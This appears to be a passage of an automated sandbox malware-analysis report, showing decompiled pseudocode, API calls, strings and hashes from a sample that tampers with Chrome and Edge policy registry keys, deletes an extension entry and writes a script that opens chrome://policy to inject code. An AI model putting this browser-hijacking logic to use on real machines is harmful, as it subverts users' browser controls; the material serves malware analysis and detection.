                                                                                                							if(_t287 - 1 !=  *_t114) {
                                                                                                								goto L143;
                                                                                                							}
                                                                                                							 *(_t497 - 0x3fbc) =  *(_t497 - 0x3fbc) + 4;
                                                                                                							 *((intOrPtr*)(_t497 - 0x3fb8)) =  *((intOrPtr*)(_t497 - 0x3fb8)) + 4;
                                                                                                							__eflags =  *((short*)(_t497 - 0x3fc0));
                                                                                                							if( *((short*)(_t497 - 0x3fc0)) != 0) {
                                                                                                								L137:
                                                                                                								_t458 =  *(_t497 - 0x3fbc);
                                                                                                								_t294 =  *_t458;
                                                                                                								 *((short*)(_t497 - 0x3fbe)) = _t294;
                                                                                                								__eflags = _t294 -  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3fb8))));
                                                                                                								if(_t294 !=  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3fb8))))) {
                                                                                                									goto L143;
                                                                                                								} else {
                                                                                                									__eflags =  *((short*)(_t497 - 0x3fbe));
                                                                                                									if( *((short*)(_t497 - 0x3fbe)) == 0) {
                                                                                                										goto L142;
                                                                                                									} else {
                                                                                                										_t458 =  *(_t497 - 0x3fbc);
                                                                                                										_t287 =  *((intOrPtr*)(_t458 + 2));
                                                                                                										 *((short*)(_t497 - 0x3fc0)) = _t287;
                                                                                                										_t405 =  *((intOrPtr*)(_t497 - 0x3fb8));
                                                                                                										continue;
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								L142:
                                                                                                								 *(_t497 - 0x3fc4) = 0;
                                                                                                							}
                                                                                                							L144:
                                                                                                							 *(_t497 - 0x3fc8) =  *(_t497 - 0x3fc4);
                                                                                                							__eflags =  *(_t497 - 0x3fc8);
                                                                                                							if( *(_t497 - 0x3fc8) != 0) {
                                                                                                								 *((intOrPtr*)(_t497 - 0x3fcc)) = L"..";
                                                                                                								 *(_t497 - 0x3fd0) = _t497 - 0x3d74;
                                                                                                								while(1) {
                                                                                                									_t478 =  *(_t497 - 0x3fd0);
                                                                                                									_t355 =  *_t478;
                                                                                                									 *((short*)(_t497 - 0x3fd2)) = _t355;
                                                                                                									__eflags = _t355 -  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3fcc))));
                                                                                                									if(_t355 !=  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3fcc))))) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags =  *((short*)(_t497 - 0x3fd2));
                                                                                                									if( *((short*)(_t497 - 0x3fd2)) == 0) {
                                                                                                										L150:
                                                                                                										 *(_t497 - 0x3fd8) = 0;
                                                                                                									} else {
                                                                                                										_t478 =  *(_t497 - 0x3fd0);
                                                                                                										_t358 =  *((intOrPtr*)(_t478 + 2));
                                                                                                										 *((short*)(_t497 - 0x3fd4)) = _t358;
                                                                                                										_t136 =  *((intOrPtr*)(_t497 - 0x3fcc)) + 2; // 0x2e
                                                                                                										__eflags = _t358 -  *_t136;
                                                                                                										if(_t358 !=  *_t136) {
                                                                                                											break;
                                                                                                										} else {
                                                                                                											 *(_t497 - 0x3fd0) =  *(_t497 - 0x3fd0) + 4;
                                                                                                											 *((intOrPtr*)(_t497 - 0x3fcc)) =  *((intOrPtr*)(_t497 - 0x3fcc)) + 4;
                                                                                                											__eflags =  *((short*)(_t497 - 0x3fd4));
                                                                                                											if( *((short*)(_t497 - 0x3fd4)) != 0) {
                                                                                                												continue;
                                                                                                											} else {
                                                                                                												goto L150;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                									L152:
                                                                                                									 *(_t497 - 0x3fdc) =  *(_t497 - 0x3fd8);
                                                                                                									__eflags =  *(_t497 - 0x3fdc);
                                                                                                									if(__eflags != 0) {
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                											0xffc2();
                                                                                                										}
                                                                                                										E01002B40(_t497 - 0x3938, _t497 - 0x3d74);
                                                                                                										_t506 = _t506 + 8;
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                										}
                                                                                                									}
                                                                                                									while(1) {
                                                                                                										L159:
                                                                                                										_t406 =  *(_t497 - 0x3fac);
                                                                                                										_t292 = FindNextFileW(_t406, _t497 - 0x3da0);
                                                                                                										__eflags = _t292;
                                                                                                										if(__eflags == 0) {
                                                                                                											break;
                                                                                                										}
                                                                                                										__eflags =  *(_t497 - 0x3da0) - 0x10;
                                                                                                										 *_t292();
                                                                                                										if(__eflags == 0) {
                                                                                                											 *((intOrPtr*)(_t497 - 0x3fb8)) = ".";
                                                                                                											 *(_t497 - 0x3fbc) = _t497 - 0x3d74;
                                                                                                											goto L137;
                                                                                                										}
                                                                                                									}
                                                                                                									_t459 =  *(_t497 - 0x3fac);
                                                                                                									FindClose(_t459);
                                                                                                									if(__eflags != 0 && __eflags == 0) {
                                                                                                										0x8589();
                                                                                                									}
                                                                                                									__eflags = 0;
                                                                                                									 *(_t497 - 0x3730) = 0;
                                                                                                									_push(0x206);
                                                                                                									 *_t459 = _t406 +  *_t459;
                                                                                                									_push(_t497 - 0x372e);
                                                                                                									E01007BE0(_t494);
                                                                                                									_push(_t497 - 0x3938);
                                                                                                									_t414 = _t497 - 0x3730;
                                                                                                									E01002B10(_t414, _t414, L"%s\\Microsoft\\EdgeCore\\%s\\msedge.exe", _t497 - 0x420);
                                                                                                									_t508 = _t506 + 0x1c;
                                                                                                									_t461 = _t497 - 0x3730;
                                                                                                									_t301 = GetFileAttributesW(_t461); // executed
                                                                                                									__eflags = _t301 - 0xffffffff;
                                                                                                									if(__eflags != 0) {
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                											0xfeeca783();
                                                                                                										}
                                                                                                										_t302 = _t497 - 0x214;
                                                                                                										 *((intOrPtr*)(_t302 + 0x68))();
                                                                                                										asm("aas");
                                                                                                										 *_t494 =  *_t494 + _t414;
                                                                                                										 *_t461 =  *_t461 + _t414;
                                                                                                										__eflags =  *_t461;
                                                                                                										 *(_t497 - 0x3b50) = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Edge\\ExtensionInstallAllowlist", ??, ??, ??);
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                										}
                                                                                                										__eflags =  *(_t497 - 0x3b50);
                                                                                                										_t162 = _t497 + 0x2f;
                                                                                                										 *_t162 = _t461 +  *(_t497 + 0x2f);
                                                                                                										__eflags =  *_t162;
                                                                                                									} else {
                                                                                                										asm("clc");
                                                                                                										if(__eflags < 0) {
                                                                                                											0xeac055d1();
                                                                                                										}
                                                                                                										_t326 = 0;
                                                                                                									}
                                                                                                									__eflags =  *(_t497 - 4) ^ _t497;
                                                                                                									return E01002B7C(_t326, _t390,  *(_t497 - 4) ^ _t497, _t466, _t494, _t495);
                                                                                                									goto L316;
                                                                                                								}
                                                                                                								asm("sbb edx, edx");
                                                                                                								asm("sbb edx, 0xffffffff");
                                                                                                								 *(_t497 - 0x3fd8) = _t478;
                                                                                                								goto L152;
                                                                                                							}
                                                                                                							goto L159;
                                                                                                							L143:
                                                                                                							asm("sbb edx, edx");
                                                                                                							asm("sbb edx, 0xffffffff");
                                                                                                							 *(_t497 - 0x3fc4) = _t458;
                                                                                                							goto L144;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t284 = 0;
                                                                                                					L133:
                                                                                                					return E01002B7C(_t284, _t390,  *(_t497 - 4) ^ _t497, _t452, _t494, _t495);
                                                                                                				}
                                                                                                				L316:
                                                                                                			}























































                                                                                                0x01001953
                                                                                                0x01001953
                                                                                                0x01001953
                                                                                                0x01001953
                                                                                                0x01001953
                                                                                                0x01001956
                                                                                                0x01001957
                                                                                                0x01001959
                                                                                                0x01001959
                                                                                                0x01001966
                                                                                                0x0100196c
                                                                                                0x01001972
                                                                                                0x01001976
                                                                                                0x01001976
                                                                                                0x01001978
                                                                                                0x0100197f
                                                                                                0x01001981
                                                                                                0x01001981
                                                                                                0x01001992
                                                                                                0x01001998
                                                                                                0x01001998
                                                                                                0x010019a2
                                                                                                0x010019a9
                                                                                                0x010019af
                                                                                                0x010019b3
                                                                                                0x010019b3
                                                                                                0x010019bc
                                                                                                0x010019c2
                                                                                                0x010019c6
                                                                                                0x010019c6
                                                                                                0x010019c2
                                                                                                0x010019c7
                                                                                                0x010019c7
                                                                                                0x010019cc
                                                                                                0x010019d1
                                                                                                0x010019d4
                                                                                                0x010019d5
                                                                                                0x010019d7
                                                                                                0x010019e4
                                                                                                0x010019ea
                                                                                                0x010019f0
                                                                                                0x010019f7
                                                                                                0x010019f9
                                                                                                0x010019fa
                                                                                                0x010019fc
                                                                                                0x010019fc
                                                                                                0x01001a0a
                                                                                                0x01001a10
                                                                                                0x01001a11
                                                                                                0x01001a13
                                                                                                0x01001a13
                                                                                                0x01001a15
                                                                                                0x01001a1a
                                                                                                0x01001a1d
                                                                                                0x01001a22
                                                                                                0x01001a23
                                                                                                0x01001a25
                                                                                                0x01001a25
                                                                                                0x01001a23
                                                                                                0x01001a27
                                                                                                0x01001a2b
                                                                                                0x01001a2b
                                                                                                0x01001a35
                                                                                                0x01001a43
                                                                                                0x01001a49
                                                                                                0x01001a4a
                                                                                                0x01001a4c
                                                                                                0x01001a4c
                                                                                                0x01001a53
                                                                                                0x01001a59
                                                                                                0x01001a59
                                                                                                0x01001a5e
                                                                                                0x01001a71
                                                                                                0x01001a76
                                                                                                0x01001a79
                                                                                                0x01001a79
                                                                                                0x01001a8c
                                                                                                0x01001a92
                                                                                                0x01001a98
                                                                                                0x01001a98
                                                                                                0x01001a9d
                                                                                                0x01001aa7
                                                                                                0x01001ab2
                                                                                                0x01001ab9
                                                                                                0x01001abe
                                                                                                0x01001ac8
                                                                                                0x01001ace
                                                                                                0x01001ad1
                                                                                                0x01001ad7
                                                                                                0x01001adb
                                                                                                0x01001adb
                                                                                                0x01001add
                                                                                                0x01001afa
                                                                                                0x01001b06
                                                                                                0x01001b15
                                                                                                0x01001b21
                                                                                                0x01001b27
                                                                                                0x01001b30
                                                                                                0x01001b44
                                                                                                0x01001b50
                                                                                                0x01001b5c
                                                                                                0x01001b5f
                                                                                                0x01001b65
                                                                                                0x01001b65
                                                                                                0x01001b6f
                                                                                                0x01001b73
                                                                                                0x01001b73
                                                                                                0x01001b6f
                                                                                                0x01001b75
                                                                                                0x01001b79
                                                                                                0x01001b79
                                                                                                0x01001b7b
                                                                                                0x01001b7b
                                                                                                0x01001b7f
                                                                                                0x01001b7f
                                                                                                0x01001b8c
                                                                                                0x01001b91
                                                                                                0x01001b94
                                                                                                0x01001b96
                                                                                                0x01001b9c
                                                                                                0x01001b9d
                                                                                                0x01001b9f
                                                                                                0x01001b9f
                                                                                                0x01001ba1
                                                                                                0x01001ba6
                                                                                                0x01001bbb
                                                                                                0x01001bc0
                                                                                                0x01001bd3
                                                                                                0x01001bdf
                                                                                                0x01001bf8
                                                                                                0x01001c04
                                                                                                0x01001c13
                                                                                                0x01001c1f
                                                                                                0x01001c25
                                                                                                0x01001c2e
                                                                                                0x01001c42
                                                                                                0x01001c4e
                                                                                                0x01001c5d
                                                                                                0x01001c63
                                                                                                0x01001c25
                                                                                                0x01001bd3
                                                                                                0x01001c6d
                                                                                                0x01001c74
                                                                                                0x01001c7b
                                                                                                0x01001c81
                                                                                                0x01001c81
                                                                                                0x01001c89
                                                                                                0x01001c8d
                                                                                                0x01001c8d
                                                                                                0x01001c96
                                                                                                0x01001c9f
                                                                                                0x01001ca3
                                                                                                0x01001ca3
                                                                                                0x01001ca4
                                                                                                0x01001caf
                                                                                                0x01001cb6
                                                                                                0x01001cbb
                                                                                                0x01001cbe
                                                                                                0x01001cbf
                                                                                                0x01001cc1
                                                                                                0x01001cc1
                                                                                                0x01001cd6
                                                                                                0x01001cdb
                                                                                                0x01001cde
                                                                                                0x01001cdf
                                                                                                0x01001ce1
                                                                                                0x01001ce1
                                                                                                0x01001cf7
                                                                                                0x01001cfc
                                                                                                0x01001cfe
                                                                                                0x01001cff
                                                                                                0x01001cff
                                                                                                0x01001d01
                                                                                                0x01001d17
                                                                                                0x01001d1c
                                                                                                0x01001d20
                                                                                                0x01001d20
                                                                                                0x01001d36
                                                                                                0x01001d3b
                                                                                                0x01001d3c
                                                                                                0x01001d3e
                                                                                                0x01001d3e
                                                                                                0x01001d56
                                                                                                0x01001d5b
                                                                                                0x01001d5f
                                                                                                0x01001d5f
                                                                                                0x01001d75
                                                                                                0x01001d7a
                                                                                                0x01001d7b
                                                                                                0x01001d7d
                                                                                                0x01001d7d
                                                                                                0x01001d8b
                                                                                                0x01001d90
                                                                                                0x01001d92
                                                                                                0x01001d93
                                                                                                0x01001d93
                                                                                                0x01001d9a
                                                                                                0x01001da0
                                                                                                0x01001da1
                                                                                                0x01001da3
                                                                                                0x01001da3
                                                                                                0x01001da5
                                                                                                0x01001dc0
                                                                                                0x01001dc0
                                                                                                0x01001dc6
                                                                                                0x01001dcc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01001dce
                                                                                                0x01001dcf
                                                                                                0x01001dcf
                                                                                                0x01001e2d
                                                                                                0x01001e31
                                                                                                0x01001e31
                                                                                                0x01001e32
                                                                                                0x01001e53
                                                                                                0x01001e59
                                                                                                0x01001ed7
                                                                                                0x01001edd
                                                                                                0x01001edd
                                                                                                0x01001ef6
                                                                                                0x01001efb
                                                                                                0x01001efc
                                                                                                0x01001efe
                                                                                                0x01001efe
                                                                                                0x01001f14
                                                                                                0x01001f1e
                                                                                                0x01001f24
                                                                                                0x01001f30
                                                                                                0x01001f35
                                                                                                0x01001f39
                                                                                                0x01001f39
                                                                                                0x01001f3b
                                                                                                0x01001f3b
                                                                                                0x00000000
                                                                                                0x01001e5b
                                                                                                0x01001e5b
                                                                                                0x01001e5f
                                                                                                0x01001e5f
                                                                                                0x01001e66
                                                                                                0x01001e66
                                                                                                0x01001e73
                                                                                                0x01001e74
                                                                                                0x01001e80
                                                                                                0x01001e87
                                                                                                0x01001e8c
                                                                                                0x01001e8f
                                                                                                0x01001e8f
                                                                                                0x01002050
                                                                                                0x01002051
                                                                                                0x01002054
                                                                                                0x01002054
                                                                                                0x01002058
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0100205a
                                                                                                0x01002061
                                                                                                0x01002068
                                                                                                0x01002070
                                                                                                0x01002018
                                                                                                0x01002018
                                                                                                0x0100201e
                                                                                                0x01002021
                                                                                                0x0100202e
                                                                                                0x01002031
                                                                                                0x00000000
                                                                                                0x01002033
                                                                                                0x01002033
                                                                                                0x0100203b
                                                                                                0x00000000
                                                                                                0x0100203d
                                                                                                0x0100203d
                                                                                                0x01002043
                                                                                                0x01002047
                                                                                                0x0100204e
                                                                                                0x00000000
                                                                                                0x0100204e
                                                                                                0x0100203b
                                                                                                0x01002072
                                                                                                0x01002072
                                                                                                0x01002072
                                                                                                0x01002072
                                                                                                0x01002089
                                                                                                0x0100208f
                                                                                                0x01002095
                                                                                                0x0100209c
                                                                                                0x010020a2
                                                                                                0x010020b2
                                                                                                0x010020b8
                                                                                                0x010020b8
                                                                                                0x010020be
                                                                                                0x010020c1
                                                                                                0x010020ce
                                                                                                0x010020d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010020d3
                                                                                                0x010020db
                                                                                                0x01002112
                                                                                                0x01002112
                                                                                                0x010020dd
                                                                                                0x010020dd
                                                                                                0x010020e3
                                                                                                0x010020e7
                                                                                                0x010020f4
                                                                                                0x010020f4
                                                                                                0x010020f8
                                                                                                0x00000000
                                                                                                0x010020fa
                                                                                                0x010020fa
                                                                                                0x01002101
                                                                                                0x01002108
                                                                                                0x01002110
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01002110
                                                                                                0x010020f8
                                                                                                0x01002129
                                                                                                0x0100212f
                                                                                                0x01002135
                                                                                                0x0100213c
                                                                                                0x0100213e
                                                                                                0x01002142
                                                                                                0x01002142
                                                                                                0x01002152
                                                                                                0x01002157
                                                                                                0x0100215a
                                                                                                0x0100215a
                                                                                                0x0100215a
                                                                                                0x0100215f
                                                                                                0x0100215f
                                                                                                0x01002166
                                                                                                0x0100216d
                                                                                                0x01002173
                                                                                                0x01002175
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01001ff5
                                                                                                0x01001ffa
                                                                                                0x01001ffc
                                                                                                0x01002002
                                                                                                0x01002012
                                                                                                0x00000000
                                                                                                0x01002012
                                                                                                0x01001ffc
                                                                                                0x0100217b
                                                                                                0x01002182
                                                                                                0x01002188
                                                                                                0x0100218c
                                                                                                0x0100218c
                                                                                                0x0100218e
                                                                                                0x01002190
                                                                                                0x01002197
                                                                                                0x0100219b
                                                                                                0x010021a4
                                                                                                0x010021a5
                                                                                                0x010021b3
                                                                                                0x010021c0
                                                                                                0x010021c7
                                                                                                0x010021cc
                                                                                                0x010021cf
                                                                                                0x010021d6
                                                                                                0x010021dc
                                                                                                0x010021df
                                                                                                0x010021ed
                                                                                                0x010021f1
                                                                                                0x010021f1
                                                                                                0x010021f2
                                                                                                0x010021f7
                                                                                                0x010021fa
                                                                                                0x010021fb
                                                                                                0x010021fd
                                                                                                0x010021fd
                                                                                                0x01002210
                                                                                                0x01002216
                                                                                                0x01002216
                                                                                                0x0100221b
                                                                                                0x01002221
                                                                                                0x01002221
                                                                                                0x01002221
                                                                                                0x010021e1
                                                                                                0x010021e1
                                                                                                0x010021e2
                                                                                                0x010021e4
                                                                                                0x010021e4
                                                                                                0x010021e6
                                                                                                0x010021e6
                                                                                                0x01002931
                                                                                                0x0100293b
                                                                                                0x00000000
                                                                                                0x0100293b
                                                                                                0x0100211e
                                                                                                0x01002120
                                                                                                0x01002123
                                                                                                0x00000000
                                                                                                0x01002123
                                                                                                0x00000000
                                                                                                0x0100207e
                                                                                                0x0100207e
                                                                                                0x01002080
                                                                                                0x01002083
                                                                                                0x00000000
                                                                                                0x01002083
                                                                                                0x01002050
                                                                                                0x01001c98
                                                                                                0x01001c98
                                                                                                0x01001f3d
                                                                                                0x01001f4a
                                                                                                0x01001f4a
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma,00000000,000F003F,?), ref: 01001966
                                                                                                • RegDeleteValueW.ADVAPI32(?,path), ref: 01001992
                                                                                                Strings
                                                                                                • SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100195C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteOpenValue
                                                                                                • String ID: SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma
                                                                                                • API String ID: 2654517830-3224148333
                                                                                                • Opcode ID: df23ab64a95c1ebd9a2c5c144281d52da70a79b3e391fa3ae454ec78455e1a8b
                                                                                                • Instruction ID: f31d97100c7c15d44c2f9cdeb22790d2cee3377c2001639ef8e8a35209366f62
                                                                                                • Opcode Fuzzy Hash: df23ab64a95c1ebd9a2c5c144281d52da70a79b3e391fa3ae454ec78455e1a8b
                                                                                                • Instruction Fuzzy Hash: 52D012705082528FEB6746A9881D424FAA06F42723F1442CAD5D5560E7CB35C041CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 79%
                                                                                                			E010015C5(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t43;
                                                                                                				void* _t44;
                                                                                                				void* _t55;
                                                                                                				void* _t56;
                                                                                                				void* _t57;
                                                                                                				void* _t63;
                                                                                                
                                                                                                				_t63 = __eflags;
                                                                                                				_t56 = __esi;
                                                                                                				_t55 = __edi;
                                                                                                				_t44 = __ecx;
                                                                                                				_t43 = __ebx;
                                                                                                				_push( *((intOrPtr*)(_t57 + __edi + 0x7e)));
                                                                                                			}









                                                                                                0x010015c5
                                                                                                0x010015c5
                                                                                                0x010015c5
                                                                                                0x010015c5
                                                                                                0x010015c5
                                                                                                0x010015c5

                                                                                                APIs
                                                                                                • WriteFile.KERNELBASE(000000FF,00000000,00000140,00000000,00000000), ref: 010015ED
                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 010015FF
                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,01001404), ref: 01001643
                                                                                                Strings
                                                                                                • chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id, xrefs: 010015DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                • String ID: chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id
                                                                                                • API String ID: 1065093856-3442544593
                                                                                                • Opcode ID: ef918b1b6b0896dc466c0d8bfe2ec7b1cac57c105e34b11aec7ef3afa0658cc1
                                                                                                • Instruction ID: 8a4bf16905a1f642e830fd1209f811d3e277e539751f7ef3bf02bce866670143
                                                                                                • Opcode Fuzzy Hash: ef918b1b6b0896dc466c0d8bfe2ec7b1cac57c105e34b11aec7ef3afa0658cc1
                                                                                                • Instruction Fuzzy Hash: 9CD0A770241206B7D763AFA6CC44BD877225F54710F244714F1B5A60F0C671F5416B6C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 16%
                                                                                                			E010018DC(void* __ebx, void* __ecx, intOrPtr* __edx, intOrPtr* __edi, void* __esi) {
                                                                                                				long _t267;
                                                                                                				void* _t406;
                                                                                                				intOrPtr* _t464;
                                                                                                				intOrPtr* _t512;
                                                                                                				void* _t513;
                                                                                                				void* _t515;
                                                                                                				intOrPtr _t530;
                                                                                                				intOrPtr _t532;
                                                                                                
                                                                                                				_t513 = __esi;
                                                                                                				_t512 = __edi;
                                                                                                				_t464 = __edx;
                                                                                                				_t406 = __ebx;
                                                                                                				 *((intOrPtr*)(__edx + 0x68))();
                                                                                                				asm("aas");
                                                                                                				 *__edi =  *__edi + __ecx;
                                                                                                				 *__edx =  *__edx + __ecx;
                                                                                                				_t530 =  *__edx;
                                                                                                				_t267 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome", ??, ??, ??); // executed
                                                                                                				 *(_t515 - 0x3540) = _t267;
                                                                                                				if(_t530 != 0 && _t530 == 0) {
                                                                                                				}
                                                                                                				_t4 = _t515 + 0x40;
                                                                                                				 *_t4 =  *((intOrPtr*)(_t515 + 0x40)) + _t464;
                                                                                                				_t532 =  *_t4;
                                                                                                			}











                                                                                                0x010018dc
                                                                                                0x010018dc
                                                                                                0x010018dc
                                                                                                0x010018dc
                                                                                                0x010018dc
                                                                                                0x010018df
                                                                                                0x010018e0
                                                                                                0x010018e2
                                                                                                0x010018e2
                                                                                                0x010018ef
                                                                                                0x010018f5
                                                                                                0x010018fb
                                                                                                0x010018fb
                                                                                                0x01001906
                                                                                                0x01001906
                                                                                                0x01001906

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome,00000000,000F003F,?), ref: 010018EF
                                                                                                Strings
                                                                                                • SOFTWARE\Policies\Google\Chrome, xrefs: 010018E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID: SOFTWARE\Policies\Google\Chrome
                                                                                                • API String ID: 71445658-2379338332
                                                                                                • Opcode ID: 879d14734af84175b65ac6f527679c741670647008f8f4ad999c13283447309b
                                                                                                • Instruction ID: 7b0fa1df2e30f6b9b4c8d1b486e40616c4cf81e745c32669a26b28b03c42c6f3
                                                                                                • Opcode Fuzzy Hash: 879d14734af84175b65ac6f527679c741670647008f8f4ad999c13283447309b
                                                                                                • Instruction Fuzzy Hash: 77D0C93040C2679FE7634B24580E154FEA4BB052B2F1857CAE6A8950D3D7658180C743
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,000F003F,?), ref: 0100121E
                                                                                                • RegCreateKeyExW.KERNELBASE(00000002,00000000,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 01001252
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateOpen
                                                                                                • String ID:
                                                                                                • API String ID: 436179556-0
                                                                                                • Opcode ID: 41e0169ea8b49cbdd5f7a2a4a950cdb4459f3e4adf67dc78d2e67ef18586f4f2
                                                                                                • Instruction ID: 5d1e466881314f4bdabf4fcef01be6d05c76abd8c812d3e06d98cecfff276fc7
                                                                                                • Opcode Fuzzy Hash: 41e0169ea8b49cbdd5f7a2a4a950cdb4459f3e4adf67dc78d2e67ef18586f4f2
                                                                                                • Instruction Fuzzy Hash: 1A019BB9944208B6EB22DB9C9C45FBD77A4AB55720F108244FA50D61C1D634DA60D761
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E010011F6(void* __eax, void* __ecx) {
                                                                                                				void* _t1;
                                                                                                
                                                                                                				_t1 = __eax;
                                                                                                			}




                                                                                                0x010011f6

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,000F003F,?), ref: 0100121E
                                                                                                • RegCreateKeyExW.KERNELBASE(00000002,00000000,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 01001252
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateOpen
                                                                                                • String ID:
                                                                                                • API String ID: 436179556-0
                                                                                                • Opcode ID: 6a78c74a563ebdb477281552ff651ad89bdcf422e31838ee56d8d6c30b9550f0
                                                                                                • Instruction ID: 237f0c752a80aff8ef3a536f16f4cda3d4d5308dca2436b9b93eaeaac781c506
                                                                                                • Opcode Fuzzy Hash: 6a78c74a563ebdb477281552ff651ad89bdcf422e31838ee56d8d6c30b9550f0
